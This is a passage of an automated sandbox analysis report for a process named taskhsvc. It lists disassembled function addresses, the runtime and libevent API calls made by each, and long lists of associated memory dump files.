      • Part of subcall function 0027A07D: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00208E4B), ref: 0027A0A6
      • Part of subcall function 001EEEF2: __stack_chk_fail.LIBSSP-0 ref: 001EF046
      • Part of subcall function 001C1929: __stack_chk_fail.LIBSSP-0 ref: 001C194F
      • Part of subcall function 001EEBE4: __stack_chk_fail.LIBSSP-0 ref: 001EEE36
      • Part of subcall function 00231A28: abort.MSVCRT ref: 00231A78
      • Part of subcall function 00231A28: memset.MSVCRT ref: 00231AA4
      • Part of subcall function 00231A28: __stack_chk_fail.LIBSSP-0 ref: 00231AE6
      • Part of subcall function 001F80E5: event_new.LIBEVENT-2-0-5 ref: 001F8149
      • Part of subcall function 001F80E5: abort.MSVCRT ref: 001F8190
      • Part of subcall function 001F80E5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002207F2), ref: 001F81C0
      • Part of subcall function 002EA547: abort.MSVCRT ref: 002EA5CA
      • Part of subcall function 002EA547: event_new.LIBEVENT-2-0-5 ref: 002EA5F7
      • Part of subcall function 002EA547: __stack_chk_fail.LIBSSP-0 ref: 002EA635
    • abort.MSVCRT ref: 00220958
      • Part of subcall function 00317AE2: __stack_chk_fail.LIBSSP-0 ref: 00317B32
      • Part of subcall function 003259C5: abort.MSVCRT ref: 00325A21
      • Part of subcall function 003259C5: _stati64.MSVCRT ref: 00325A8E
      • Part of subcall function 003259C5: free.MSVCRT ref: 00325AA7
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325AD7
      • Part of subcall function 003259C5: _mkdir.MSVCRT ref: 00325B54
      • Part of subcall function 003259C5: strerror.MSVCRT ref: 00325B72
      • Part of subcall function 003259C5: __stack_chk_fail.LIBSSP-0 ref: 00325C45
    • free.MSVCRT ref: 00220AD3
      • Part of subcall function 003134C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 00313519
      • Part of subcall function 003134C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 003136B7
      • Part of subcall function 003134C5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,00220AE4), ref: 003136D4
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
      • Part of subcall function 001F4130: abort.MSVCRT ref: 001F419F
      • Part of subcall function 001F4130: __stack_chk_fail.LIBSSP-0 ref: 001F43C1
      • Part of subcall function 0031470B: abort.MSVCRT ref: 0031475B
      • Part of subcall function 0031470B: strlen.MSVCRT ref: 0031481E
      • Part of subcall function 0031470B: abort.MSVCRT ref: 003148E2
      • Part of subcall function 0031470B: __stack_chk_fail.LIBSSP-0 ref: 003148FF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 0031490C: abort.MSVCRT ref: 00314959
      • Part of subcall function 0031490C: abort.MSVCRT ref: 00314A03
      • Part of subcall function 0031490C: __stack_chk_fail.LIBSSP-0 ref: 00314A20
      • Part of subcall function 00314268: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031431D
      • Part of subcall function 00314268: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031437D
      • Part of subcall function 00314268: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00220ABA), ref: 0031439E
      • Part of subcall function 00314B17: abort.MSVCRT ref: 00314B64
      • Part of subcall function 00314B17: abort.MSVCRT ref: 00314BD4
      • Part of subcall function 00314B17: __stack_chk_fail.LIBSSP-0 ref: 00314BF1
      • Part of subcall function 0022B2E4: _fileno.MSVCRT ref: 0022B634
      • Part of subcall function 0022B2E4: strcmp.MSVCRT ref: 0022B741
      • Part of subcall function 0022B2E4: strerror.MSVCRT ref: 0022B78B
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B7DF
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B860
      • Part of subcall function 0022B2E4: free.MSVCRT ref: 0022B89E
      • Part of subcall function 0022B2E4: __stack_chk_fail.LIBSSP-0 ref: 0022B900
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 003190A8: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,002208EC), ref: 00319106
      • Part of subcall function 00330A40: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00220731), ref: 00330A60
    • abort.MSVCRT ref: 00220DBF
    • __stack_chk_fail.LIBSSP-0 ref: 00220EE6
      • Part of subcall function 00317969: abort.MSVCRT ref: 00317A89
      • Part of subcall function 00317969: __stack_chk_fail.LIBSSP-0 ref: 00317AB4
      • Part of subcall function 00314A27: abort.MSVCRT ref: 00314A74
      • Part of subcall function 00314A27: abort.MSVCRT ref: 00314AEE
      • Part of subcall function 00314A27: __stack_chk_fail.LIBSSP-0 ref: 00314B10
      • Part of subcall function 001F7582: __stack_chk_fail.LIBSSP-0 ref: 001F76E8
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 00328790: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,002206E9), ref: 003287AC
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00325CFA, Relevance: 15.2, APIs: 10, Instructions: 213
    APIs
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
    • abort.MSVCRT ref: 00325D72
    • abort.MSVCRT ref: 00325DB1
    • free.MSVCRT ref: 00325FFF
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 00325DF6
      • Part of subcall function 003213EE: abort.MSVCRT ref: 0032143E
      • Part of subcall function 003213EE: _strdup.MSVCRT ref: 00321449
      • Part of subcall function 003213EE: exit.MSVCRT ref: 0032148A
      • Part of subcall function 003213EE: __stack_chk_fail.LIBSSP-0 ref: 0032149D
      • Part of subcall function 00316107: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161A4
      • Part of subcall function 00316107: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FAF4), ref: 003161B7
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 00325ECF
    • __stack_chk_fail.LIBSSP-0 ref: 0032601B
      • Part of subcall function 00316BC4: _lseek.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00325F20), ref: 00316BF5
      • Part of subcall function 00316BC4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00325F20), ref: 00316C12
    • strerror.MSVCRT ref: 00325F30
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • _close.MSVCRT ref: 00325F8C
    • free.MSVCRT ref: 00325FB5
    • free.MSVCRT ref: 00325FDD
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0022D5B4, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 340
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    • memset.MSVCRT ref: 0022D62C
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031ADAF
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031ADEE
      • Part of subcall function 0031AD40: strchr.MSVCRT ref: 0031AE3D
      • Part of subcall function 0031AD40: strstr.MSVCRT ref: 0031AE5A
      • Part of subcall function 0031AD40: strchr.MSVCRT ref: 0031AE76
      • Part of subcall function 0031AD40: abort.MSVCRT ref: 0031AEE4
      • Part of subcall function 0031AD40: strlen.MSVCRT ref: 0031AF08
      • Part of subcall function 0031AD40: __stack_chk_fail.LIBSSP-0 ref: 0031AFED
    • strchr.MSVCRT ref: 0022D699
      • Part of subcall function 003223BF: strlen.MSVCRT ref: 003223E1
      • Part of subcall function 003223BF: strncmp.MSVCRT ref: 003223FD
      • Part of subcall function 003223BF: __stack_chk_fail.LIBSSP-0 ref: 0032240D
    • strlen.MSVCRT ref: 0022D73F
      • Part of subcall function 00331E6E: memset.MSVCRT ref: 00331EE0
      • Part of subcall function 00331E6E: abort.MSVCRT ref: 00331F97
      • Part of subcall function 00331E6E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0026CC39), ref: 00331FB1
      • Part of subcall function 0032248D: strlen.MSVCRT ref: 003224AF
      • Part of subcall function 0032248D: __stack_chk_fail.LIBSSP-0 ref: 003224DD
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F189
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F1C8
      • Part of subcall function 0032F113: abort.MSVCRT ref: 0032F207
      • Part of subcall function 0032F113: free.MSVCRT ref: 0032F28C
      • Part of subcall function 0032F113: __stack_chk_fail.LIBSSP-0 ref: 0032F2A6
      • Part of subcall function 0021F6D4: __stack_chk_fail.LIBSSP-0 ref: 0021F6FB
    • free.MSVCRT ref: 0022DB91
      • Part of subcall function 0032326B: __stack_chk_fail.LIBSSP-0 ref: 003233C7
      • Part of subcall function 00322B81: __stack_chk_fail.LIBSSP-0 ref: 00322BBD
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F30F
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F34E
      • Part of subcall function 0032F2AD: abort.MSVCRT ref: 0032F38D
      • Part of subcall function 0032F2AD: __stack_chk_fail.LIBSSP-0 ref: 0032F3FD
    • __stack_chk_fail.LIBSSP-0 ref: 0022DBB1
      • Part of subcall function 0032E186: abort.MSVCRT ref: 0032E1F1
      • Part of subcall function 0032E186: strlen.MSVCRT ref: 0032E213
      • Part of subcall function 0032E186: free.MSVCRT ref: 0032E2C3
      • Part of subcall function 0032E186: __stack_chk_fail.LIBSSP-0 ref: 0032E2DD
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0024E04C: __stack_chk_fail.LIBSSP-0 ref: 0024E0EB
      • Part of subcall function 0024E0F2: __stack_chk_fail.LIBSSP-0 ref: 0024E175
      • Part of subcall function 00323938: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0021FF97), ref: 00323967
      • Part of subcall function 00323938: __stack_chk_fail.LIBSSP-0 ref: 003239A8
    • free.MSVCRT ref: 0022DB41
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00322F87: strtol.MSVCRT ref: 00322FFB
      • Part of subcall function 00322F87: __stack_chk_fail.LIBSSP-0 ref: 003230F2
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855077166.00228000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001DE526, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 160
    APIs
    • abort.MSVCRT ref: 001DE588
    • abort.MSVCRT ref: 001DE5C7
    • abort.MSVCRT ref: 001DE60E
    • abort.MSVCRT ref: 001DE655
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 001DC6F2: __stack_chk_fail.LIBSSP-0 ref: 001DC728
    • abort.MSVCRT ref: 001DE730
    • __stack_chk_fail.LIBSSP-0 ref: 001DE7A0
      • Part of subcall function 00211618: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001DE759), ref: 0021166F
      • Part of subcall function 00211618: __stack_chk_fail.LIBSSP-0(?), ref: 002116CD
      • Part of subcall function 002EAE33: abort.MSVCRT ref: 002EAE8A
      • Part of subcall function 002EAE33: abort.MSVCRT ref: 002EAECC
      • Part of subcall function 002EAE33: __stack_chk_fail.LIBSSP-0 ref: 002EAFEA
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C63F3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 121
    APIs
      • Part of subcall function 002CE121: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C6409), ref: 002CE1A2
    • event_active.LIBEVENT-2-0-5 ref: 001C6458
    • time.MSVCRT ref: 001C648C
      • Part of subcall function 0032545C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA788), ref: 00325486
      • Part of subcall function 003EC2B0: abort.MSVCRT ref: 003EC2FD
      • Part of subcall function 003EC2B0: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1AEF), ref: 003EC312
    • event_base_loop.LIBEVENT-2-0-5 ref: 001C64B2
    • __stack_chk_fail.LIBSSP-0 ref: 001C65E4
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 003EC319: event_base_get_method.LIBEVENT-2-0-5 ref: 003EC331
      • Part of subcall function 003EC319: __stack_chk_fail.LIBSSP-0 ref: 003EC341
    Strings
    Memory Dump Source
